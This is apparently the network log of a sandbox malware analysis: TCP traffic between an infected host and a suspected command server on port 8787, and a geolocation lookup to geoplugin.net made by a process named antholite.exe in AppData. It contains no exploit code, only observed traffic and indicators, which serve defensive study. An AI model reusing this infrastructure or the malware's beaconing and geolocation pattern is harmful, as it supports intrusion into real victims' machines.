                        Sep 3, 2024 15:24:09.022141933 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022171974 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022315979 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022329092 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022341013 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022360086 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022360086 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022378922 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022392035 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022393942 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022408009 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022443056 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022465944 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022773981 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022788048 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022830009 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.022861004 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.022994995 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023008108 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023020029 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023031950 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023040056 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023045063 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023056984 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023066998 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023085117 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023199081 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023211002 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023231983 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023241997 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023274899 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023328066 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023339987 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023351908 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023358107 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023371935 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023387909 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023416996 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023449898 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023463011 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023477077 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023495913 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023519993 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.023564100 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023576975 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.023622990 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024327993 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024342060 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024354935 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024365902 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024389982 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024410963 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024446964 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024460077 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024470091 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024477959 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024497986 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024511099 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024521112 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024522066 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024530888 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024559975 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024573088 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024584055 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024586916 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024600983 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024615049 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024631023 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024657011 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024859905 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024878979 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024892092 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024928093 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.024964094 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024976969 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.024991989 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025006056 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025011063 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.025019884 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025032043 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025032997 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.025043964 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025057077 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025059938 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.025069952 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025079012 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.025096893 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025106907 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.025110960 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.025154114 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026103973 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026115894 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026191950 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026228905 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026242018 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026253939 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026258945 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026272058 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026302099 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026333094 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026345968 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026357889 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026375055 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026403904 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026464939 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026479006 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026490927 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026520014 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026599884 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026640892 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026654005 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026669025 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026669025 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026685953 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026695967 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026714087 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026730061 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.026731014 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.026777983 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027051926 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027249098 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027261019 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027272940 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027287006 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027292013 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027302027 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027318001 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027318001 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027331114 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027344942 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027347088 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027360916 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027381897 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027391911 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027400970 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027414083 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027415991 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027434111 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.027440071 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.027478933 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.028234005 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.028249025 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.028296947 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.385318041 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390283108 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390307903 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390328884 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390343904 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390358925 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390357971 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390374899 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390388012 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390391111 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390414953 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390436888 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390450001 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390463114 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390476942 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390484095 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390507936 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390580893 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390595913 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390608072 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390623093 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390623093 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390645981 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390656948 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390659094 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390698910 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390819073 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390831947 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390844107 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390856028 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390872002 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390872955 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390889883 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390893936 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390913010 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390927076 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390938997 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390939951 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390954971 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390960932 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390970945 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.390980005 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.390985966 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391016960 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391135931 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391146898 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391160011 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391174078 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391190052 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391191959 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391202927 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391211033 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391230106 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391235113 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391242981 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391258001 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391287088 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391324043 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391350031 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391364098 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391376019 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391390085 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391402006 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391417027 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391421080 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391436100 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391452074 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391453028 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391468048 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:09.391480923 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.391509056 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:09.441864014 CEST8049706178.237.33.50192.168.2.5
                        Sep 3, 2024 15:24:09.441932917 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:24:11.741301060 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.042254925 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.651602030 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.680156946 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.680224895 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.680422068 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.680485010 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.680975914 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.680985928 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681036949 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.681389093 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681435108 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681438923 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:12.681639910 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681651115 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681659937 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681670904 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681680918 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.681684971 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.685067892 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.685189962 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.685302973 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.685312033 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.685801983 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.685986996 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.686443090 CEST878749705192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:12.686530113 CEST497058787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:14.764683962 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:14.766375065 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:14.771343946 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:44.772291899 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:24:44.776555061 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:24:44.781502008 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:25:14.797111988 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:25:14.802134991 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:25:14.806967020 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:25:45.174824953 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:25:45.176368952 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:25:45.177789927 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:25:45.177840948 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:25:45.181448936 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:25:57.777126074 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:25:58.151664019 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:25:58.854808092 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:26:00.057934046 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:26:02.651652098 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:26:07.557917118 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:26:14.817228079 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:26:14.818553925 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:26:14.823473930 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:26:17.354789019 CEST4970680192.168.2.5178.237.33.50
                        Sep 3, 2024 15:26:44.823299885 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:26:44.834172010 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:26:44.839157104 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:27:14.829685926 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:27:14.831681013 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:27:14.836883068 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:27:44.843878984 CEST878749704192.210.150.26192.168.2.5
                        Sep 3, 2024 15:27:44.848443031 CEST497048787192.168.2.5192.210.150.26
                        Sep 3, 2024 15:27:44.853349924 CEST878749704192.210.150.26192.168.2.5

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 3, 2024 15:24:07.802879095 CEST5590653192.168.2.51.1.1.1
                        Sep 3, 2024 15:24:07.811259985 CEST53559061.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 3, 2024 15:24:07.802879095 CEST192.168.2.51.1.1.10xf40cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Sep 3, 2024 15:24:07.811259985 CEST1.1.1.1192.168.2.50xf40cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • geoplugin.net

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549706178.237.33.50806364C:\Users\user\AppData\Local\Cocles\antholite.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 15:24:07.821610928 CEST71OUTGET /json.gp HTTP/1.1
                        Host: geoplugin.net
                        Cache-Control: no-cache
                        Sep 3, 2024 15:24:08.739424944 CEST1170INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 13:24:08 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}
                        Sep 3, 2024 15:24:08.739896059 CEST1170INHTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 13:24:08 GMT
                        server: Apache
                        content-length: 962
                        content-type: application/json; charset=utf-8
                        cache-control: public, max-age=300
                        access-control-allow-origin: *
                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
